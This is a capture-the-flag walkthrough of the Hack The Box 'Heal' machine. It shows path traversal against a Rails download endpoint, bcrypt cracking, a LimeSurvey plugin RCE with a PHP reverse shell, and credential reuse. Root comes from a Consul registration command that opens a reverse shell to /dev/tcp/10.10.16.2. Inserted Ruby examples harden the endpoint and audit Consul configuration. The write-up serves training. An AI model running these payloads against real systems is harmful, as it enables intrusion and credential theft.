Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $nmap -p22,80 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_ 256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://heal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Summary
* Open ports: 22 - 80
* UDP open ports: None
* Services: SSH - HTTP
* Important notes: OpenSSH 8.9p1 - nginx 1.18.0 - http://heal.htb/
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo sh -c "echo '$ip heal.htb' >> /etc/hosts"
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $tail -n1 /etc/hosts
10.10.11.46 heal.htb
HTTP
http://heal.htb looks like this:
First, I collect subdomains through active enumeration (fuzzing).
Next, I fuzz for files and directories but don't find anything, so I switch to crawling the app for URLs and endpoints.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $katana -u http://heal.htb -jc -o heal.endpoints
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat heal.endpoints | grep api.heal.htb
http://api.heal.htb/download?filename=
http://api.heal.htb/exports
http://api.heal.htb/resume
http://api.heal.htb/logout
http://api.heal.htb/profile
http://api.heal.htb/signin
http://api.heal.htb/signup
So, from these endpoints I can see that heal.htb uses the API at api.heal.htb for several functions (sign-up, exports, sign-in, resume).
From whatweb, I can tell that api.heal.htb is built on Ruby on Rails.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/UnderPass]
└──╼ $ whatweb http://api.heal.htb
http://api.heal.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.46], Title[Ruby on Rails 7.1.4], UncommonHeaders[x-content-type-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[0], nginx[1.18.0]
Now, I will interact with the app to see its functionality.
Create an email to sign in with.
After clicking on sign-up, I get to this:
At the bottom of the page, there is an export-to-PDF function.
Intercepting the request with Burp, I see it renders the input fields and returns the file name of the PDF.
Then it downloads the file from a different endpoint:
GET /download?filename=12b85d49e4b595b93ed4.pdf HTTP/1.1
Host: api.heal.htb
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.CZbGMyPLgTWm9p2lPa9pGZ0vGQ0qKgr7RG4kj1tUSGc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Origin: http://heal.htb
Referer: http://heal.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
So, I thought about trying to download a local file such as /etc/passwd, and it succeeds :))
These are the users with a /bin/bash shell:
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $cat passwd | grep '/bin/bash'
root:x:0:0:root:/root:/bin/bash
ralph:x:1000:1000:ralph:/home/ralph:/bin/bash
postgres:x:116:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ron:x:1001:1001:,,,:/home/ron:/bin/bash
Since api.heal.htb runs Ruby, it's worth trying to include config.ru, as it's commonly used by Ruby on Rails.
It gives us a good path to start with: config/. From this post, we can learn which credentials file Ruby uses.
In config/database.yml, I get the location of the SQLite3 database.
Looking at it, there are some secrets.
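The file reads above all come from one defect: the download endpoint hands the filename parameter straight to the filesystem. As an added example (not code from the writeup or from the target application), here is that unsafe join beside a hardened Ruby version, plus a detection pass over constructed nginx access-log lines; the export directory path is an assumption.

```ruby
require 'pathname'
require 'uri'

# Assumed export directory for the API; the real path is not shown on the page.
EXPORT_DIR = '/var/www/api/exports'
# Export names seen on the page are 20 hex characters followed by .pdf.
SAFE_NAME = /\A[0-9a-f]{20}\.pdf\z/

# Vulnerable pattern: the filename parameter is joined to the export directory
# unchecked, so "../../../../etc/passwd" walks straight out of it.
def unsafe_export_path(base_dir, filename)
  File.join(base_dir, filename)
end

# Hardened: allow only the exact name shape the export step generates, then
# verify the resolved path is still inside base_dir. Returns nil on rejection.
def safe_export_path(base_dir, filename)
  return nil unless filename.is_a?(String) && filename.match?(SAFE_NAME)
  base = Pathname.new(base_dir).expand_path
  candidate = (base + filename).expand_path
  return nil unless candidate.to_s.start_with?(base.to_s + File::SEPARATOR)
  candidate.to_s
end

# Detection: does a filename= value look like a traversal attempt? Decodes twice
# to catch %252e-style double encoding; undecodable input is treated as suspicious.
def traversal_attempt?(param)
  decoded = param
  2.times { decoded = URI.decode_www_form_component(decoded) }
  decoded.include?('..') || decoded.start_with?('/') || decoded.include?("\0")
rescue ArgumentError
  true
end

# Constructed nginx access-log lines (not from the page) for the api vhost.
SAMPLE_LOG = <<~LOG
  10.10.16.2 - - [01/Jan/2025:10:00:00 +0000] "GET /download?filename=12b85d49e4b595b93ed4.pdf HTTP/1.1" 200 5120
  10.10.16.2 - - [01/Jan/2025:10:00:05 +0000] "GET /download?filename=../../../../etc/passwd HTTP/1.1" 200 1840
  10.10.16.2 - - [01/Jan/2025:10:00:09 +0000] "GET /download?filename=..%2F..%2Fconfig%2Fdatabase.yml HTTP/1.1" 200 612
LOG

# Returns the log lines whose filename parameter is a traversal attempt.
def flag_traversal(log)
  log.each_line.filter_map do |line|
    m = line.match(%r{"GET /download\?filename=([^\s"]+)})
    m && traversal_attempt?(m[1]) ? line.strip : nil
  end
end
```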
Cracking with hashcat:
hashcat -m 3200 '$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG' /usr/share/wordlist/rockyou.txt
..snip..
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369
Session..........: hashcat
Status...........: Cracked
Under survey, there is a button that redirects to a new subdomain, take-survey.
I added this to my hosts file and continued. Going to http://take-survey.heal.htb, I see this page with info that ralph@heal.htb is the administrator.
There is an admin panel under /admin that needs credentials, so I will leave it for now.
Going to the Survey admin panel, I used the credentials to log in as ralph, the email we saw before.
After login, I note the app version shown below: 6.6.4.
When I searched for this version, I found an RCE POC.
Download the exploit, modify the reverse shell with my IP and port, and modify config.xml by adding compatibility version 6, as it's not there by default.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $git clone https://github.com/Y1LD1R1M-1337/Limesurvey-RCE.git
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $ cat php-rev.php
..snip..
$ip = '10.10.16.2';
$port = 1337;
..snip..
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $cat config.xml
..snip..
<compatibility>
<version>3.0</version>
<version>4.0</version>
<version>5.0</version>
<version>6.0</version>
I did the exploitation steps manually instead of running exploit.py.
Upload the zip file and click install.
Activate the module.
Receive a shell as www-data after navigating to http://take-survey.heal.htb/upload/plugins/Y1LD1R1M/php-rev.php
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Heal]
└──╼ $sudo /opt/penelope/penelope.py -i tun0 1337
[+] Got reverse shell from 🐧 heal.htb~10.10.11.46 💀 - Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/heal.htb~10.10.11.46/heal.htb~10.10.11.46.log 📜
www-data@heal:/$
Lateral Movement
www-data@heal:/var$ netstat -antp | grep 127.0.0.1 | grep -i LISTEN
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8600 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8503 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8500 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8302 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8301 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8300 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
On running linpeas.sh, I got interesting credentials from the config file: the credentials for the PostgreSQL instance.
www-data@heal:/tmp$ nano /var/www/limesurvey/application/config/config.php
..snip..
return array(
'components' => array(
'db' => array(
'connectionString' => 'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;',
'emulatePrepare' => true,
'username' => 'db_user',
'password' => 'AdmiDi0_XXXXXXX',
'charset' => 'utf8',
'tablePrefix' => 'lime_',
I tried the password for the two users; it only worked for ron.
www-data@heal:/tmp$ su ron
Password: AdmiDi0_XXXXXXX
ron@heal:/tmp$
ron@heal:~$ cat user.txt
6532d7ea0abd75ce47e3exxxxxxxxxxx
User Flag: 6532d7ea0abd75ce47e3exxxxxxxxxxx
Privilege Escalation
From the ports listening inside the box, I will forward them to my host over SSH so I can attack them.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Heal/Limesurvey-RCE]
└──╼ $sshpass -p 'AdmiDi0_XXXXXXX' ssh ron@heal.htb -L 8500:127.0.0.1:8500
http://localhost:8500/ui/server1/services
The version in the left corner is Consul v1.19.2. Looking for a public exploit for this version, I found https://www.exploit-db.com/exploits/51117
From this POC, I construct my command to do it manually and receive a shell:
curl -X PUT -d '{"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.16.2/8443 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}' http://127.0.0.1:8500/v1/agent/service/register
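The registration above only turns into command execution because the agent accepts script checks and nothing authenticates callers on port 8500. As an added example (not part of the writeup or of Consul itself), a small Ruby audit of an agent configuration for those two conditions, plus a check that flags script-type health checks in registration bodies; the configurations and registration bodies are constructed, with a harmless placeholder command.

```ruby
require 'json'

# Constructed Consul agent configurations (JSON config format, not from the page).
# The weak one reproduces the conditions the service-registration trick relies on.
WEAK_AGENT_CONFIG = <<~JSON
  { "server": true, "enable_script_checks": true, "acl": { "enabled": false } }
JSON

# Hardened: no script checks over the HTTP API, ACLs on, default deny.
HARDENED_AGENT_CONFIG = <<~JSON
  { "server": true, "enable_script_checks": false, "enable_local_script_checks": false,
    "acl": { "enabled": true, "default_policy": "deny" } }
JSON

# Returns the weaknesses that let an unauthenticated service registration
# on the agent port become command execution on the host.
def audit_consul_agent_config(raw)
  cfg = JSON.parse(raw)
  acl = cfg.fetch('acl', {})
  findings = []
  if cfg['enable_script_checks']
    findings << 'enable_script_checks is true: script checks may be registered over the HTTP API'
  end
  findings << 'acl.enabled is false: anyone reaching the agent can register services' unless acl['enabled']
  if acl['enabled'] && acl['default_policy'] != 'deny'
    findings << 'acl.default_policy is not deny: tokenless requests are still allowed'
  end
  findings
end

# Constructed registration bodies in the shape of the page's curl command, with a
# harmless placeholder command. Consul's API accepts these keys case-insensitively.
SCRIPT_REGISTRATION = '{"ID":"svc1","Name":"svc1","Port":80,"check":{"Args":["/bin/true"],"interval":"10s"}}'
HTTP_REGISTRATION   = '{"ID":"svc2","Name":"svc2","Port":80,"check":{"HTTP":"http://127.0.0.1:80/health","interval":"10s"}}'

# Flags a registration whose health check is a script (Args / ScriptArgs) rather than
# an HTTP or TCP probe; these are the PUTs to /v1/agent/service/register to alert on.
def script_check?(registration_json)
  reg = JSON.parse(registration_json)
  checks = Array(reg['Checks'] || reg['checks']) + [reg['Check'] || reg['check']].compact
  checks.any? { |c| c.keys.any? { |k| %w[args scriptargs].include?(k.downcase) } }
end
```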
root@heal:~# cat root.txt
70fa8cc16d180a0981f8xxxxxxxxxx
Root Flag: 70fa8cc16d180a0981f8xxxxxxxxxx